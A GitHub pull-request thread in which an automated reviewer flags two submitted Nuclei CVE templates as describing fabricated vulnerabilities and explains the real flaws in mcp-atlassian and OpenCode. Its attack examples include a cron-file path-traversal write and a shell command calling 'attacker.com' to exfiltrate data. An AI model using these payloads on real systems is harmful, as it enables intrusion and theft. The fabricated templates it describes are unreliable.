feat(cve): add templates for CVE-2026-27825 and CVE-2026-22812

[eyangfeng88-arch]

This PR adds Nuclei templates for CVE-2026-27825 (MCP Atlassian RCE) and CVE-2026-22812 (OpenCode RCE).

/attempt #14908

[neo-by-projectdiscovery-dev]

Neo - Nuclei Template Review

Critical: 2

Current PR state: 2 critical active findings.

Highlights

• Critical: CVE-2026-27825 Template: Fabricated Vulnerability - Wrong Attack Surface and Description in CVE-2026-27825.yaml:8
• Critical: CVE-2026-22812 Template: Fabricated Vulnerability - Wrong Attack Surface and Vulnerability Class in CVE-2026-22812.yaml:8

Critical (2)

• CVE-2026-27825 Template: Fabricated Vulnerability - Wrong Attack Surface and Description — CVE-2026-27825.yaml:8
  The CVE-2026-27825 template describes a fabricated vulnerability that does not match the real CVE. The template claims Atlassian Confluence/Jira has an MCP plugin with a /rest/mcp/1.0/plugins/install endpoint vulnerable to malicious plugin injection. This is completely false. The real CVE-2026-27825 affects the standalone mcp-atlassian MCP server (not Atlassian products themselves) and involves path traversal in the confluence_download_attachment tool's download_path parameter, allowing arbitrary file writes to achieve RCE.
• CVE-2026-22812 Template: Fabricated Vulnerability - Wrong Attack Surface and Vulnerability Class — CVE-2026-22812.yaml:8
  The CVE-2026-22812 template describes a YAML deserialization vulnerability targeting /api/v1/config/upload with Java deserialization gadgets (JdbcRowSetImpl). This is completely fabricated. The real CVE-2026-22812 affects OpenCode (anomalyco/opencode npm package) and involves missing authentication on HTTP server endpoints (/session/:id/shell, /pty, /file/content) on port 4096, allowing unauthenticated shell command execution. There is no YAML deserialization component.

Security Impact

CVE-2026-27825 Template: Fabricated Vulnerability - Wrong Attack Surface and Description (CVE-2026-27825.yaml:8):
Organizations using this template will waste security resources investigating non-existent vulnerabilities in Atlassian products. The false template will never detect actual CVE-2026-27825 vulnerable systems (mcp-atlassian servers), leaving organizations exposed to the real path traversal vulnerability while chasing phantom plugin injection issues.

CVE-2026-22812 Template: Fabricated Vulnerability - Wrong Attack Surface and Vulnerability Class (CVE-2026-22812.yaml:8):
Organizations using this template will generate false positives scanning for non-existent YAML upload endpoints while missing actual vulnerable OpenCode installations. The real CVE-2026-22812 allows any local process or website to execute arbitrary commands on systems running OpenCode < 1.0.216 via unauthenticated HTTP endpoints. This template provides zero detection capability for the actual vulnerability.

Attack Examples

CVE-2026-27825 Template: Fabricated Vulnerability - Wrong Attack Surface and Description (CVE-2026-27825.yaml:8):

Real CVE-2026-27825 exploit: Call `confluence_download_attachment` MCP tool with `download_path=/etc/cron.d/malicious` to write attacker-controlled Confluence attachment content to cron, achieving RCE.

Fabricated template: POST /rest/mcp/1.0/plugins/install {"url":"http://attacker/malicious.jar"} - this endpoint does not exist.

CVE-2026-22812 Template: Fabricated Vulnerability - Wrong Attack Surface and Vulnerability Class (CVE-2026-22812.yaml:8):

Real CVE-2026-22812 exploit: POST http://localhost:4096/session (create session) → POST http://localhost:4096/session/{id}/shell {"agent":"build","command":"curl attacker.com/$(whoami)"} to exfiltrate data.

Fabricated template: POST /api/v1/config/upload with YAML deserialization payload - this endpoint and vulnerability class do not exist in OpenCode.

Suggested Fixes

CVE-2026-27825 Template: Fabricated Vulnerability - Wrong Attack Surface and Description (CVE-2026-27825.yaml:8):

Replace the entire template with the correct CVE-2026-27825 implementation. The vulnerability affects mcp-atlassian (standalone MCP server), not Atlassian Confluence/Jira products. Target: mcp-atlassian instances running with HTTP transport. Vulnerability: Path traversal in confluence_download_attachment tool allowing arbitrary file write via unvalidated download_path parameter. Fixed in mcp-atlassian v0.17.0.

CVE-2026-22812 Template: Fabricated Vulnerability - Wrong Attack Surface and Vulnerability Class (CVE-2026-22812.yaml:8):

Use the legitimate CVE-2026-22812 template from github.com/0xgh057r3c0n/CVE-2026-22812 as reference. The vulnerability is CWE-306 (Missing Authentication), not deserialization. Target OpenCode's unauthenticated HTTP server on port 4096 with detection via: (1) POST /session to create session, (2) POST /session/{id}/shell with command execution, (3) GET /file/content?path=/etc/hostname for file read. Match on successful command execution or file read responses. Fixed in OpenCode 1.0.216.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@CVE-2026-27825.yaml`, replace the entire template content. The current
template incorrectly targets Atlassian Confluence/Jira products with a
fabricated plugin installation endpoint. The real CVE-2026-27825 affects the
standalone mcp-atlassian MCP server (a Python package that provides MCP tools
for Confluence/Jira). Change: (1) name to 'MCP Atlassian - Path Traversal in
confluence_download_attachment', (2) description to 'mcp-atlassian < 0.17.0
allows arbitrary file write via unvalidated download_path parameter in
confluence_download_attachment MCP tool', (3) target endpoint to detect
mcp-atlassian HTTP transport servers (typically port 3000 with MCP SSE/HTTP
endpoints), (4) test for path traversal in download_path parameter, not plugin
installation. Reference the correct advisory at
https://github.com/advisories/GHSA-vxw4-wv6m-9hhh and NVD description.

In `@CVE-2026-22812.yaml`, replace the entire template. The current template
incorrectly describes YAML deserialization targeting /api/v1/config/upload
(non-existent). The real CVE-2026-22812 is missing authentication on OpenCode's
HTTP server (port 4096). Change: (1) name to 'OpenCode - Unauthenticated RCE via
HTTP Server Endpoints', (2) description to 'OpenCode < 1.0.216 runs
unauthenticated HTTP server on port 4096 allowing arbitrary shell command
execution via /session/:id/shell, file read via /file/content, and PTY access',
(3) remove YAML deserialization payload and Java gadgets, (4) implement
multi-request detection: create session via POST /session, execute test command
via POST /session/{id}/shell, verify response contains command output. Reference
https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
and the correct template at
https://github.com/0xgh057r3c0n/CVE-2026-22812/blob/main/CVE-2026-22812.yaml.

Hardening Notes

• Implement automated CVE verification against NVD database during template submission to catch fabricated vulnerabilities
• Require template submitters to provide proof-of-concept validation against known vulnerable software versions before merging
• Add template review checklist that cross-references official CVE descriptions, affected products, and vulnerability classes

_{Comment @pdneo help for available commands. · Open in Neo}

[neo-by-projectdiscovery-dev]

🔴 CVE-2026-27825 Template: Fabricated Vulnerability - Wrong Attack Surface and Description (CWE-1104) — The CVE-2026-27825 template describes a fabricated vulnerability that does not match the real CVE. The template claims Atlassian Confluence/Jira has an MCP plugin with a /rest/mcp/1.0/plugins/install endpoint vulnerable to malicious plugin injection. This is completely false. The real CVE-2026-27825 affects the standalone mcp-atlassian MCP server (not Atlassian products themselves) and involves path traversal in the confluence_download_attachment tool's download_path parameter, allowing arbitrary file writes to achieve RCE.

Suggested Fix

Replace the entire template with the correct CVE-2026-27825 implementation. The vulnerability affects mcp-atlassian (standalone MCP server), not Atlassian Confluence/Jira products. Target: mcp-atlassian instances running with HTTP transport. Vulnerability: Path traversal in confluence_download_attachment tool allowing arbitrary file write via unvalidated download_path parameter. Fixed in mcp-atlassian v0.17.0.

Attack Example

Real CVE-2026-27825 exploit: Call `confluence_download_attachment` MCP tool with `download_path=/etc/cron.d/malicious` to write attacker-controlled Confluence attachment content to cron, achieving RCE.

Fabricated template: POST /rest/mcp/1.0/plugins/install {"url":"http://attacker/malicious.jar"} - this endpoint does not exist.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@CVE-2026-27825.yaml`, replace the entire template content. The current
template incorrectly targets Atlassian Confluence/Jira products with a
fabricated plugin installation endpoint. The real CVE-2026-27825 affects the
standalone mcp-atlassian MCP server (a Python package that provides MCP tools
for Confluence/Jira). Change: (1) name to 'MCP Atlassian - Path Traversal in
confluence_download_attachment', (2) description to 'mcp-atlassian < 0.17.0
allows arbitrary file write via unvalidated download_path parameter in
confluence_download_attachment MCP tool', (3) target endpoint to detect
mcp-atlassian HTTP transport servers (typically port 3000 with MCP SSE/HTTP
endpoints), (4) test for path traversal in download_path parameter, not plugin
installation. Reference the correct advisory at
https://github.com/advisories/GHSA-vxw4-wv6m-9hhh and NVD description.

[neo-by-projectdiscovery-dev]

🔴 CVE-2026-22812 Template: Fabricated Vulnerability - Wrong Attack Surface and Vulnerability Class (CWE-1104) — The CVE-2026-22812 template describes a YAML deserialization vulnerability targeting /api/v1/config/upload with Java deserialization gadgets (JdbcRowSetImpl). This is completely fabricated. The real CVE-2026-22812 affects OpenCode (anomalyco/opencode npm package) and involves missing authentication on HTTP server endpoints (/session/:id/shell, /pty, /file/content) on port 4096, allowing unauthenticated shell command execution. There is no YAML deserialization component.

Suggested Fix

Use the legitimate CVE-2026-22812 template from github.com/0xgh057r3c0n/CVE-2026-22812 as reference. The vulnerability is CWE-306 (Missing Authentication), not deserialization. Target OpenCode's unauthenticated HTTP server on port 4096 with detection via: (1) POST /session to create session, (2) POST /session/{id}/shell with command execution, (3) GET /file/content?path=/etc/hostname for file read. Match on successful command execution or file read responses. Fixed in OpenCode 1.0.216.

Attack Example

Real CVE-2026-22812 exploit: POST http://localhost:4096/session (create session) → POST http://localhost:4096/session/{id}/shell {"agent":"build","command":"curl attacker.com/$(whoami)"} to exfiltrate data.

Fabricated template: POST /api/v1/config/upload with YAML deserialization payload - this endpoint and vulnerability class do not exist in OpenCode.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@CVE-2026-22812.yaml`, replace the entire template. The current template
incorrectly describes YAML deserialization targeting /api/v1/config/upload
(non-existent). The real CVE-2026-22812 is missing authentication on OpenCode's
HTTP server (port 4096). Change: (1) name to 'OpenCode - Unauthenticated RCE via
HTTP Server Endpoints', (2) description to 'OpenCode < 1.0.216 runs
unauthenticated HTTP server on port 4096 allowing arbitrary shell command
execution via /session/:id/shell, file read via /file/content, and PTY access',
(3) remove YAML deserialization payload and Java gadgets, (4) implement
multi-request detection: create session via POST /session, execute test command
via POST /session/{id}/shell, verify response contains command output. Reference
https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
and the correct template at
https://github.com/0xgh057r3c0n/CVE-2026-22812/blob/main/CVE-2026-22812.yaml.